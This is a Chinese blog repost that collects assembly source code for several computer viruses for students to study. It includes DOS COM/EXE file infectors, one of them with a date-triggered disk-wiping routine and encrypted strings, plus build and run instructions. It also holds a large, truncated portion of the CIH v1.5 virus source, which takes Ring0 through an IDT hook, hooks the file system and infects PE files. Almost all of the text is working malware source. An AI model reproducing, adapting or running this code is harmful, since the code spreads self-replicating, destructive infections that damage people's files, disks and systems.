用汇编写的病毒代码
转自:http://www.programfan.com/blog/article.asp?id=6671
用汇编写的病毒代码
下面的几个病毒程序希望同学们仔细研读,不懂不要紧,先看熟。
病毒一、
;功能:感染当前文件夹的test.com文件
;并删除当前文件夹的del.txt文件
;显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性.
--------------------------------------------------------------------------------
病毒二、
用汇编语言写一个简单病毒程序源代码
; 感染对象: DOS 的 EXE COM 文件
; 编译工具: MASM 6.0 , MASM 6.11
CODE SEGMENT
assume cs:code
.386
org 100h
start:
mov cs:oldsp,sp ; 保存原程序的堆栈指针
mov cs:oldss,ss ;
mov sp,stack_end
mov ax,cs ; 设置新的堆栈指针
mov ss,ax ;
push ds ;保存原 ds es
push es ;
mov ds,ax
mov es,ax
sub ax,oldseg ; 算出原程序的入口
push ax ; 并保存入栈
push oldip ;
call setfile ;程序的核心部分
pop cs:oldip ; 取回原程序的入口
pop cs:oldseg ;
pop es ; 恢复原 es ds
pop ds ;
mov sp,cs:oldss ; 恢复原 ss,sp
mov ss,sp ;
mov sp,cs:oldsp ;
push oldseg ;跳回原程序入口点
push oldip ;
retf ;
db 09ah
getdate proc near ;这个函数是取得时间是否是星期二是则破坏硬盘数据
mov ax,0ec32h ; 写要执行的代码 int 13h
not ax ; 到 @dest1 位置
mov si,@des1 ; 这里既加密代码
mov word ptr [si],ax ;
mov ah,2ah
int 21h
cmp al,2
jnz @gd_con
mov ax,312h
mov cx,1
mov dx,80h
@des1:
db 0ebh
db 32
ret
@gd_con:
ret
getdate endp
setfile1 proc near
call findfirst
@sf_con:
jc @sf_back
call modify
call findnext
jmp @sf_con
@sf_back:
ret
setfile1 endp
setdata proc near
push si
push di
push cx
push ax
pushf
mov si,offset normal1
mov di,si
mov cx,23h
@aaa2:
lodsb
not ax
stosb
loop @aaa2
popf
pop ax
pop cx
pop di
pop si
ret
setdata endp
setfile proc near
cmp ax,127h ; 没有作用只是干挠
jnz @aaa1 ; ax 不可能等于 127h
call dword ptr oldsp ;
ret ;
db 0e8h ;
@aaa: call getdate
ret
@aaa1:
mov ah,01ah ;设置磁盘传输地址
mov dx,offset dta ;用于 findfirst
int 21h ;
call setdata ;数据解密
push @aaa
mov dx,offset normal1 ; 找 *.exe
mov ax,offset dta
add ax,01eh
mov fs,ax ; fs 用于传递文件名的地址
call setfile1 ; 传染文件
mov dx,offset normal2 ; 找 *.com
call setfile1
mov dx,offset bootcmd ; 找 c:\windows\command.com
mov fs,dx
call setfile1
mov dx,offset bootcmd1 ; 找 c:\command.com
mov si,dx ;
mov word ptr [si],':C' ;
mov fs,dx ;
call setfile1 ;
ret
setfile endp
db 09ah
findfirst proc near
mov ax,04e27h
int 21h
ret
findfirst endp
findnext proc near
mov ah,04fh
int 21h
ret
findnext endp
modify proc near ;修改并感染程序
mov si,offset sbuffer ;可执行的文件头的地址
mov di,offset dta ;文件信息的地址
cmp dword ptr [di+01ah],1000 ; 若文件小于 1K 或 大于 1M 不感染
jb @fn_ret ;
cmp dword ptr [di+01ah],0ffcffh ;
jae @fn_ret ;
mov dx,fs
mov ax,4300h ;保存原文件属性
int 21h ;再改为没有属性
push cx ;
mov ax,4301h
xor cx,cx
int 21h
mov ax,03d02h ; 打开文件
int 21h ;
jc @fn_ret3 ;
mov bx,ax ; 读文件头
mov ah,03fh ;
mov cx,1ch ;
mov dx,offset sbuffer ;
int 21h ;
cmp word ptr [si],'ZM' ; 如不是可执行文件就不感染
jnz @fn_ret1 ;
mov ax,word ptr [si+014h] ; 保存原程序入口
mov oldip,ax ;
mov ax,word ptr [si+016h] ;
mov oldseg,ax
mov ax,4200h ; 检查是否已经被我感染过
mov cx,word ptr [di+1ch] ;
mov dx,word ptr [di+1ah] ;
sub dx,2 ;
int 21h ;
mov ah,3fh ;
mov cx,2 ;
mov dx,offset temp ;
int 21h
cmp word ptr temp,0dcd6h ; 若已经被感染就返回
jz @fn_ret1 ;
mov eax,dword ptr [di+01ah] ; 得到文件的总长
mov cx,0fh
and cx,ax ; 算出感染后的入口点
mov fill,010h ;
sub fill,cx ;
movzx ecx,fill ;
add eax,ecx ;
sub eax,100h
shr eax,4
mov cx,word ptr [si+8]
sub ax,cx
mov word ptr [si+14h],100h
mov word ptr [si+16h],ax
sub ax,oldseg
mov oldseg,ax
mov ax,4202h ;把本病毒写至文件尾
xor cx,cx ;
xor dx,dx ;
int 21h
call setdata
mov ah,40h
mov cx,offset theend
mov dx,offset start
sub dx,fill
sub cx,dx
int 21h
call setdata
jc @fn_ret1
mov ax,4202h ; 算出加载程序的长度
xor cx,cx ;
xor dx,dx ;
int 21h
mov cx,200h
div cx
inc ax
mov word ptr [si+2],dx
mov word ptr [si+4],ax
mov ax,4200h ;改写文件头
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
mov dx,si
mov cx,1ch
int 21h
@fn_ret1:
mov ah,03eh ;关闭文件
int 21h ;
@fn_ret3:
pop cx ;恢复原文件属性
mov ax,4301h ;
mov dx,gs
int 21h
@fn_ret:
ret
modify endp
oldip word 0
oldseg word 0
;======== 用 not 换算过的数据 ========
normal1 db 0d5h,0d1h,09ah,087h,09ah,0ffh ; '*.EXE'
normal2 db 0d5h,0d1h,09ch,090h,092h,0ffh ; '*.COM'
bootcmd db 0bch,0c5h,0a3h,0a8h,0b6h,0b1h,0bbh,0b0h ; 'C:\WINDO'
bootcmd1 db 0a8h,0ach,0a3h,0bch,0b0h,0b2h,0b2h,0beh ; 'WS\COMMAND.COM'
db 0b1h,0bbh,0d1h,0bch,0b0h,0b2h,0ffh
fl word 0dcd6h
theend:
oldsp word 0
oldss word 0
temp word 0
temp1 word 0
dta db 02bh dup(0)
fill word 0
sbuffer db 1dh dup(0)
stack_start db 40h dup(0)
stack_end:
code ends
end start
--------------------------------------------------------------------------------
保持清醒和独立,思想是属于自己的
病毒三、
最简单的病毒
这个病毒恐怕是世界上最简单的病毒了,它只会感染,不会有破坏动作。
Coolest对病毒的每一部分给出了详细的注释。不要说你看不懂哦。^_^
VirusLength equ VirusEnd-VirusStart
codeseg segment
assume cs:codeseg,ds:codeseg,ss:codeseg
org 100h
main proc near
InfectedCode db "M"
db 3 dup(90h)
VirusStart:
call WhereIAm
WhereIAm:
pop si
;si指向pop si的首地址now
mov bp,si
add si,Original4Bytes-WhereIAm
;si指向Original4Bytes的首地址now
mov di,100h
movsw
movsw
;恢复原来的文件头4个字节,以执行完病毒体后返回时正常
;执行原程序
mov si,bp
;si指向pop si的首地址now
mov ah,4eh
Look4NextTarget:
mov dx,offset Target-WhereIAm
add dx,si
mov cx,0
int 21h
;查找第一个com文件
jc error
mov ax,3d02h
mov dx,9eh
int 21h
jc error
xchg ax,bx
mov ah,3fh
mov dx,si
add dx,Original4Bytes-WhereIAm
mov cx,4
int 21h
;保留原com文件前4个字节
mov al,'M'
cmp ds:[si+Original4Bytes-WhereIAm],al
jz SickOrExe
;已感染或是exe文件
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
;移动指针到文件尾
mov di,offset FourNewBytes-WhereIAm
add di,2
add di,si
;di指向0,0的第一个0
sub ax,4
;恐怕最难明白就是这里了
;病毒把'M' e9写进文件头两个字节里后
;e9 wx yz被翻译为 jmp near $+2+yzwx
;ax此时为文件长度,从而
;文件头两条指令为
;dec bp
;jmp near (文件尾)
mov ds:[di],ax
add si,VirusStart-WhereIAm
;si指向VirusStart
mov ah,40h
mov dx,si
mov cx,VirusLength
int 21h
;写病毒体进文件
mov si,bp
;si指向pop si的首地址now(即WhereIAm)
jc error
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
;移动文件指针到文件头
mov ah,40h
mov cx,4
mov dx,si
add dx,FourNewBytes-WhereIAm
int 21h
;使文件执行时先跳到文件尾的病毒体执行
jc error
mov ah,3eh
int 21h
;关闭文件,感染完成
SickOrExe:
mov ah,4fh
jmp Look4NextTarget
error:
mov ax,100h
push ax
ret
;文件头四个字节已经恢复,可以正常执行原程序了
main endp
Original4Bytes:
ret
db 3 dup(?)
;病毒初次运行时,若没找到com文件,就会
;执行ret到psp段首
Target db "*.com",0
FourNewBytes db 'M',0e9h,0,0
VirusEnd equ $
codeseg ends
end main
使用说明:
用Masm或Tasm编译,然后用Exe2Com转换为com文件,运行即可感染当前目录下的
所有com文件。
病毒四、
病毒汇编源码
;本病毒并无实质的破坏作用,仅供
;同仁理解Virus原理
;
;病毒源程序
code segment
ASSUME CS:CODE ,DS:CODE
VIRUS:MOV AX,CS
MOV DS,AX
MOV ES,AX
DB 0BBH
GROW DW 0H
LEA SI,BUFFER0[BX]
MOV DI,100H
MOV CX,3
REP MOVSB
MOV AH,1AH
LEA DX,DIR_BUFF[BX]
INT 21H
MOV AH,4EH
MOV CX,20H
LEA DX,SCH_STR[BX]
INT 21H
JC FAIL0
LEA DI,DIR_BUFF[BX]
MOV CX,8
INC DI
MOV AL,3FH
REP STOSB
MOV AH,4FH
INT 21H
FAIL0:JC FAIL1
LEA DI,SCH_STR[BX]
LEA SI,FILE_NAME[BX]
CLD
MOV CX,13
REP MOVSB
MOV AH,3DH
MOV AL,2
LEA DX,FILE_NAME[BX]
INT 21H
FAIL1:JNC FAIL3
JMP FAIL2
FAIL3:MOV FHANDLE[BX],AX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,3FH
PUSH BX
LEA DX,BUFFER0[BX]
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
MOV AH,42H
MOV AL,2
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
SUB AX,3
MOV BUFFER2[BX],AX
ADD AX,103H
MOV GROW[BX],AX
MOV DX,FILE_LENGTH[BX]
ADD AX,DX
JC FAIL2
MOV AH,BUFFER0[BX]
CMP AH,0E9H
JNZ WRITE
MOV AX,BUFFER2[BX]
SUB AX,BUFFER3[BX]
CMP AX,FILE_LENGTH[BX]
JZ CLOSE
WRITE:MOV AH,40H
MOV DX,BX
PUSH BX
MOV DX,BX
MOV CX,FILE_LENGTH[BX]
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,42H
MOV AL,0
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,0
MOV DX,0
INT 21H
POP BX
MOV AH,40H
LEA DX,BUFFER1[BX]
PUSH BX
MOV BX,FHANDLE[BX]
MOV CX,3
INT 21H
POP BX
CLOSE: MOV AH,3EH
PUSH BX
MOV BX,FHANDLE[BX]
INT 21H
POP BX
MOV AH,2CH
INT 21H
AND AH,02H
;JZ FAIL2
CALL SHOW
PUSH CS
MOV AX,100H
PUSH AX
XOR AX,AX
RETF
;JMP SHORT 100
FAIL2: LEA AX,BACK[BX]
SUB AX,0FEH
NOT AX
INC AX
MOV BACK[BX],AX
MOV AH,4CH
INT 21H
DB 0E9H
BACK DW 0FFEBH
SHOW:MOV AX,2
INT 10H
MOV AH,9
LEA DX,STRING[BX]
INT 21H
RET
STRING DB 0AH,0AH,0AH,0DH
DB 'SWTJU VIRUS v0.01 '
病毒五、
CIH V1.5版本病毒源码
Preface:
曾经的CIH病毒威震天下,快看看这V1.5版本的代码
Content:
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : [email protected] *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
IF DEBUG
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetTonewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
